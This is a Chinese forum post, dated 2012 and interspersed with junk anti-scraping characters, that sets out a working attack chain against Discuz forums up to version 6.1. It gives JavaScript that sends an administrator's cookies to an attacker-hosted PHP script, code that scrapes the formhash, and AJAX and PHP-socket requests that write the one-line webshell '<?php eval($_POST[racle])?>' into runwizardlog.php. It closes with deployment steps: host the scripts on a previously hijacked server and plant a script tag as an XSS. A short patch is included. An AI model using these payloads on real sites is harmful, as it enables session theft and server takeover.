Discuz XSS得webshell
- S9 O) F8 c( t; S6 w7 ]By racle @tian6.com6 ] p* v; r1 u6 m' Q: K6 P
欢迎转帖.但请保留版权信息.
. F7 y s) C* b' w) S受影响版本 iscuz<=6.1.0,gbk+utf+big57 _; \& x+ r4 f
' S7 {" a6 E: V6 `0 k k$ C9 h新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
* j9 h: ^$ G9 P. W" l( p; l( Q4 @; M& d& V3 p% W
% j5 @" T7 I) V7 w2 O, c. t3 a
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=87060 Z! L- E* h0 ?
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.( [& n& w, x: ]3 V$ F0 J
, M8 g, B% `8 Z# x
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
2 ]& Q/ [/ U( F+ E# m本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS# g& F& X8 G; k+ r! k. D
) p, t9 ^6 h% ~. P& j G5 n
# f/ \$ b; h# S/ l1 l+ z----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
6 \, p2 D' Z ?( C9 }6 c4 K; @7 n7 u3 i7 j: O. J
5 o4 |! m: x; f7 ]/ y% r: e+ |
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交." F/ O1 Y/ \4 M/ d- ?, k4 M) B
) n6 H1 k) h+ r/ |# Yproblem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
% F' m4 b( G$ j; P# _1 r, @' q8 u+ I# g/ y3 K: f% D' W$ v6 @* g5 x
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.1 t" \' l4 I7 j5 O$ R) K6 L* ]
: R T1 `& W! t& ]! i: t
% U7 \- r1 K' G8 M
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {1 w& w) d% {- d( J4 c0 p1 l
9 D5 h4 g; Q7 s global $runwizardfile, $runwizardhistory;
6 K4 c/ d' Q2 P% _
1 b( Z1 s6 A6 i W* o; W $fp = fopen($runwizardfile, 'w');8 U( r# B! e0 n, e8 p
# G8 _7 u) \( B" d6 }4 l3 C fwrite($fp, serialize($runwizardhistory));
+ w! Q8 N+ ~9 y; K) R2 |
2 j, a) i! c) b# c9 w fclose($fp);$ Q8 t/ v& f" i- T8 D+ b
! \7 N. m6 ?7 I! X}9 v+ i- \" v7 ?
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.# I* B1 i0 u7 F! l
以下是修补的办法:function saverunwizardhistory() {
+ z& @& V1 a& \; ?! \8 w: `! E8 B
; v' {! e' X8 x; X: | global $runwizardfile, $runwizardhistory;
2 `3 v$ Q6 j, Z
: a8 E4 r5 T3 _ $fp = fopen($runwizardfile, 'w');
1 }! Q3 L: p8 T7 r" e8 p; C4 ?
9 _2 C( G$ }% A; P5 N $s = '<?php exit;?>';% U, U" Z' l1 ]
5 _1 E0 H' L9 Y% ]3 B: x2 [ R
$s .= serialize($runwizardhistory);3 c1 }8 A5 r# q/ k$ T0 r
6 ?- N3 n- G) O; S$ k
fwrite($fp, $s);
; O. h0 ]$ `2 O. h0 O9 p
! w& c. u @* P fclose($fp);
* V3 X- V1 U# P) D9 {2 z2 q; \" W0 p1 U$ j0 B- k# P) e* h+ o
}
2 l" L- ~% A4 B5 a复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.* j4 k* ?: E- i w
( Y8 u) C6 z, b [# ~- v8 f9 ?5 o1 W
0 Z# Z* g+ B# ]( w. d
) ], _$ f6 s2 D2 M P( K- @+ x8 m----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
8 l1 B/ ~2 q* B8 k+ r2 t& t- `: k `1 j* N$ f: ~1 C
- i7 U) d8 p q! f 以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
( `, u; {, D& l, s8 U0 o6 d7 r1 F/ ~* h, q$ G
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.! n; W* u) j: f+ Q4 v& L
7 d0 _ }5 e. X v# K
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
. d4 D" ]! \* y) T) W% y. ~6 g- s6 v; i. s
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:4 }9 M) l5 {* S/ j: M) X" h
+ |1 ?5 |; Q" k
var url="http://目标网站/admincp.php";
% \: b/ Q. d' |9 D' @, S4 @" p& k/ |6 p X0 h- d! v f
/*获得cookies*/
7 Z. z# |$ o$ f7 N! s: @, v- L$ D# H5 {! i
function getURL(s) {
3 Q/ p$ ^+ h9 c' R$ o7 R
( |6 s l0 N4 t" vvar image = new Image();/ O) U' Y Z; ?5 L! x" c+ P
' s# g) R# X$ h0 V8 Z8 T3 n; ?; ?
image.style.width = 0;, [$ Y( H4 ~$ b9 h, c1 l
0 z! y1 ^. q. q. m' N
image.style.height = 0;
+ {8 k- K- B+ A( s( s
! @7 m* N. P' B* M0 d/ C Limage.src = s; _7 f5 V n- h( [3 ?: U+ o) \' ~
+ j+ i) ~# j# f+ {8 ]; w9 X7 l
}
. S+ u$ t R+ x$ u8 ]2 u' G. }6 G; }. ]
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php0 g7 z+ ^' w$ Q: |7 J
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
x$ R9 l/ a F! H$ t% w4 G复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)  % U5 {6 D$ j+ S- m9 i* N( b
[ D; v7 U- A, x; q
6 l+ k6 V1 t6 |( o# D# {* P获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";2 t; s; _8 Q! b' A4 ^, t
: l. ~. I' Y+ z- g) j9 b s7 k- m$ @/ Z& @% m _8 Q! z' ?
( t! c6 n2 y# u2 t; j/*hash*/
Y: Z/ `3 r7 k" j' J
6 ]. D: y& I+ k2 A. r/ s9 rvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
+ c4 q/ ^. g9 Y* Z. s
0 F: q/ ?1 o; }xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
+ f u+ V/ s7 R: d1 d4 G
/ y) A' y1 d& E2 GxmlHttpReq.send();# T+ T2 W# {, l( Z- {
: V" k! ~2 A$ N) xvar resource = xmlHttpReq.responseText;3 L2 R# t' E% ?0 p+ M! j
- P& w2 h. A2 o/ h; A: w3 Avar numero = resource.search(/formhash/);6 u, k$ \% j2 p0 {3 e L7 u
# x0 l) R# ]) yvar formhash=encodeURIComponent(resource.substr(numero+17,8));( X: q f3 ]* Q- e0 v! z: p
1 g1 ?- u2 T% r- @. U
1 C8 Q, x+ Q2 u1 {% d
- q( N- I# x' e$ Z4 Y
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
0 W* I( A% c1 J0 T' D7 E {0 D9 x! a. m; J' J3 A
xmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 : M. Y# k# k1 t
8 j* m3 [' b& i$ h- r% e5 Z
xmlHttpReq.setRequestHeader("Referer", url);
4 d: s E$ r" i! d5 |3 M- V. M6 v' X/ |
1 @# s/ R6 k0 N- Z' W0 x* O3 B& zxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");" B& t, X# h- c* }$ A" ^) y5 |" E
. x6 F2 A2 e* _8 x1 zxmlHttpReq.setrequestheader("content-length",post.length);
% Z! X/ i( g+ Q7 E! ?; j/ e& L [2 V/ s6 F$ Y2 B% L/ p
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); * h8 n7 s8 x: y' _
* P3 j2 b* [. W' V& M8 k
xmlHttpReq.send(post);//发送数据
! e5 Z! }# z2 W4 W m复制代码这里HASH我假设正确,这样提交,也无须cookies
+ Z# n3 j4 e$ h, |7 Q* g1 X# m1 m) [! B9 A$ q
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);! [ p6 H1 T D. v' Z+ r( O3 T8 q* r
8 @5 \0 o6 p( Y( aif (!$sock) die("$errstr ($errno)\n");
) x. p! E- Q! I3 n% l- A+ Y) k4 n* O; w# U; e
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';6 y% b" [& S5 p) x, t
# l! H& ^$ M# q% e
+ Y: h8 M$ U" @! B
8 n2 ?# k2 L( E3 ?" a+ U
fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");9 \, i& U- J. O4 X+ C0 J# t- n( b
7 Z" W/ c+ Z$ B" N: e
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");' `" w1 }9 r, f6 b, K+ i* K2 V1 t
" N- x: Q8 @* a3 W. D p
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
1 l7 p! e: r& d
* ]' w: e- a! d& gfwrite($sock, "Accept-Language: zh-cn\r\n");
1 ]0 l& i2 K0 {) _1 Z2 \
`+ i, s0 Z2 `0 r7 O9 ]4 ofwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");; V- a A3 M. o( O
0 x$ C) q! F( J/ P& p! }5 Dfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");2 B6 M6 r* M' n
" B8 X. n3 _9 h2 a7 z
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"); j$ ^) ? Q% v2 j8 ]% S8 `
1 M9 a. Q. ?7 s/ z% R7 V5 R4 N
fwrite($sock, "Host: $url\r\n");
: B, n$ [- K- u {/ z. G) R4 G6 B
+ R0 q0 A& E8 rfwrite($sock, "Content-Length: ".strlen($data)."\r\n");6 |( c' x$ M+ N) f: J* P
& }9 A& e& A0 X
fwrite($sock, "Connection: Keep-Alive\r\n");. b7 r6 G7 P2 R( W$ f, z' d
' z# F' \* [! n) {$ Z. B$ [fwrite($sock, "Cache-Control: no-cache\r\n");
1 C; t+ Y( r" c8 C2 p* T" v: N. P0 n* U. ^; _
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");7 S7 \- i' b" y
; F- q/ P; d2 Dfwrite($sock, $data);: F% @; Q$ M8 l' P0 m
3 ^7 B+ `' E: Q+ |+ `7 P1 @% T0 R+ y! H' U; J
8 a4 g. P& y) w- Y$headers = "";! F+ \0 c$ O0 D# |9 P. }) Z- A5 q
7 T( a/ U: j \ U) x7 Gwhile ($str = trim(fgets($sock, 4096)))
/ E& P9 d' Y1 M1 o$ W
$ E; `# `& Z2 m5 h: _: H2 n9 F$ S) S $headers .= "$str\n";
9 L5 ]# }: a; p: q: i" p: F2 |( I
9 a! d& Z; x; j5 y" E. a& g Qecho "\n";
- h/ U% _& g7 r" F c! X$ ~5 X' _# {. V
$body = "";
- S I3 h- E$ n( Q( q1 E F
. |( ~- P: Y, [0 J* q) v2 [% @while (!feof($sock))
' @8 j7 J- H$ @5 | G4 P- \- K- t, e" k: s; w' h
$body .= fgets($sock, 4096);
- k& e' g% q( N, Q9 J/ O+ }2 u5 j. v! r" A
fclose($sock);
, Y5 H! B) Q3 K1 _0 j1 `, G# w0 _$ s# s* E
echo $body;
1 Z' u0 z# Z/ U- Z' z k复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
* W* e" e9 X# r4 n) m: g+ d
/ A2 F* L/ K& @3 A3 X6 ^! G* v9 f* C, G2 n/ P# O0 G4 J
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
. ]2 D: N! p9 w; j
; b# }# F4 t5 \' {7 c6 u8 @+ I4 _8 v: |6 q* e
1 HP SOCKET利用方法首先打开racle.js+ {& m/ q8 Y$ C3 I
9 m/ N3 S; S8 i# e. Vvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
3 K; U4 [% Z' Q% }9 [4 ]& U& a3 B* h, }1 z3 k, A f8 z: k$ j
8 d+ Z( v7 p. {8 ~9 L
* j, X; S3 C: N, O4 Q: b3 p6 G然后打开racle@tian6.php
5 p& K7 U0 w4 c- @ Y, o7 H7 F, i( o
$ L& p- t1 @+ R( \- C+ P5 r- l$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com7 u6 o- A2 ~- G- U8 D
. P0 D/ z% t* Y, Q E& t) A, F, ]/ E' c& s
0 P/ b3 @: h. T- t; q( U# d
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
) d( n/ w5 s2 ^- G* v: q5 |* O5 S* O h7 ?* X' {
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));6 W9 S3 c% _! |9 e+ o
+ S$ x2 w* g* f/ B7 E$ E g7 H4 R为2 E8 e; r! J. Z3 Z
" j7 e& y }& t' y# o; z# XgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));. \5 I! w! c" [5 s, v- N, j
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址., }" S) X; D1 k6 `( Z6 t
, A ?0 X: V |# Z$ {/ A8 z/ @. a+ F: o, G8 j
) @& i& z. [( z. Y3 O
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:+ D/ |) l& \8 } n; |: j3 {
: I3 ~! a1 }8 q9 z$ Q- Ovar formhash=encodeURIComponent(resource.substr(numero+17,8));
$ u3 a* q! G! B; x8 O, a' V
- L8 B+ O( k) e, _, k为
! P$ \5 ~4 E& G5 V* X a3 |2 Z& M- q1 ?7 d
var formhash=encodeURIComponent(resource.substr(numero+9,8));
2 O+ h" |% Y" e! m& g; M) u, Z复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
. _ n5 |& C( t! ~5 F7 _0 s" `4 @0 i
$ k8 t9 s* \; c# C. k0 q如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
7 n2 \1 v$ s6 m$ W I
* R# j$ p) @' ]; b; C* Q4 T- D- _如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
! c, f0 Q J2 L4 Y- _5 C& N7 x( y. F8 c; i: Z/ C; V/ w) Y
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.' Y( `( C% c1 f! m4 ]. W/ l
3 F) r/ ?# e6 u0 z% c$ d6 v/ C
|
发表于 2012-9-13 17:11:49
收藏
支持
反对